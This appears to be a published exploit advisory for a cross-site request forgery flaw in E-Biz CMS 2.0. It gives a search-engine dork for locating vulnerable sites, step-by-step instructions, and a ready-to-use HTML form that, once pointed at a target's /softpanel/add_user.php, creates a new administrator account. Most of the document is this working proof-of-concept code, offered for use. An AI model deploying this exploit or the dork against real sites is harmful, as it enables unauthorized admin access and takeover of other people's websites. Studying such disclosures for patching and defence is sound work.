Headline
E-Biz CMS 2.0 Cross Site Request Forgery
E-Biz CMS version 2.0 suffers from a cross site request forgery vulnerability.
====================================================================================================================================
| # Title : E-Biz CMS v2.0 CSRF Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) |
| # Vendor : https://softech.pk/ |
| # Dork : Copyright © 2019, Designed By SOFTECH |
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] The following html code create a new admin .
[+] Go to the line 17.
[+] Set the target site link Save changes and apply .
[+] infected file : /add_user.php.
[+] http://127.0.0.1/q7.3/softpanel/add_user.php.
[+] save code as poc.html .
<h1>Add User</h1>
</div>
<!-- #contentHeader -->
<div class="site">
<div class="container">
<div class="grid-16">
<div class="widget" >
<div class="widget-header"> <span class="icon-wrench"></span>
<h3>Add User </h3>
</div>
<!-- .widget-header -->
<div class="widget-content">
<!-- .field-group -->
<!-- .field-group -->
<!-- .field-group -->
<form action="http://aosccom/softpanel/add_user.php" method="post" enctype="multipart/form-data" name="" class="form uniformForm validateForm">
<table width="650" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td width="527" align="left"><strong>Name : </strong></td>
</tr>
<tr>
<td><input name="name" value="" class="validate[required]" type="text" id="name" size="50"></td>
</tr>
<tr>
<td><strong>Email :</strong> </td>
</tr>
<tr>
<td><span class="field">
<input name="email" type="text" id="date" class="validate[required,custom[email]" size="50" />
</span></td>
</tr>
<tr>
<td><strong>Password :</strong></td>
</tr>
<tr>
<td><div class="field">
<input name="password" type="text" id="date_English" class="validate[required]" size="50" />
</div> </td>
</tr>
<tr>
<td><strong>Access : </strong></td>
</tr>
<tr>
<td><select name="type" id="type" >
<option value="user" selected="selected">User</option>
<option value="admin">Admin</option>
</select> </td>
</tr>
<tr id="link">
<td><table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td height="30"><strong id="">Privileges:</strong></td>
</tr>
<tr>
<td align="center" valign="middle"><table width="400" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td width="54%" height="25" align="left"><table width="150" border="0" cellspacing="0" cellpadding="0">
<tr>
<td height="25"><label for="label">Company News</label></td>
<td width="10"><input type="checkbox" id="new" name="news" value="Y" onClick="news.value=(this.checked)?'Y':'N'"></td>
</tr> <tr>
<td height="25">Home Banners</td>
<td><input type="checkbox" id="ban" name="banners" value="Y" onClick="banners.value=(this.checked)?'Y':'N'" ></td>
</tr> <tr>
<td height="25">Gallery</td>
<td><input type="checkbox" id="gal" name="gallery" value="Y" onClick="gallery.value=(this.checked)?'Y':'N'"></td>
</tr> <tr>
<td height="25"><label for="sim">Simple Gallery</label></td>
<td><input type="checkbox" id="gallery" name="simple_gallery" value="Y" onClick="simple_gallery.value=(this.checked)?'Y':'N'"></td>
</tr> <tr>
<td height="25">Pages</td>
<td><input name="pages" type="checkbox" id="pages"onClick="pages.value=(this.checked)?'Y':'N'" value="checkbox" checked></td>
</tr> <tr>
<td height="25">Newsletter</td>
<td><input name="newsletter" type="checkbox" id="newsletter"onClick="newsletter.value=(this.checked)?'Y':'N'" value="checkbox" checked></td>
</tr> <tr>
<td height="25">Categories</td>
<td><input name="categories" type="checkbox" id="categories" onClick="categories.value=(this.checked)?'Y':'N'" value="checkbox" checked></td>
</tr> </table> </td>
</tr>
</table> </td>
</tr>
</table></td>
</tr>
<tr>
<td></td>
</tr>
<tr>
<td></td>
</tr>
<tr>
<td> </td>
</tr>
</table>
</td>
</tr>
<tr>
<td></td>
</tr>
<tr>
<td> </td>
</tr>
<tr>
<td></td>
</tr>
<tr>
<td> </td>
</tr>
<tr>
<td> </td>
</tr>
<tr>
<td><button name="save"class="btn btn-primary"><span class="icon-move-alt2"></span>Save</button>
<button type="reset" class="btn btn-primary"><span class="icon-move-horizontal-alt2"></span>Cancel</button></td>
</tr>
</table>
</form>
</div>
Greetings to :=================================================================
jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |
===============================================================================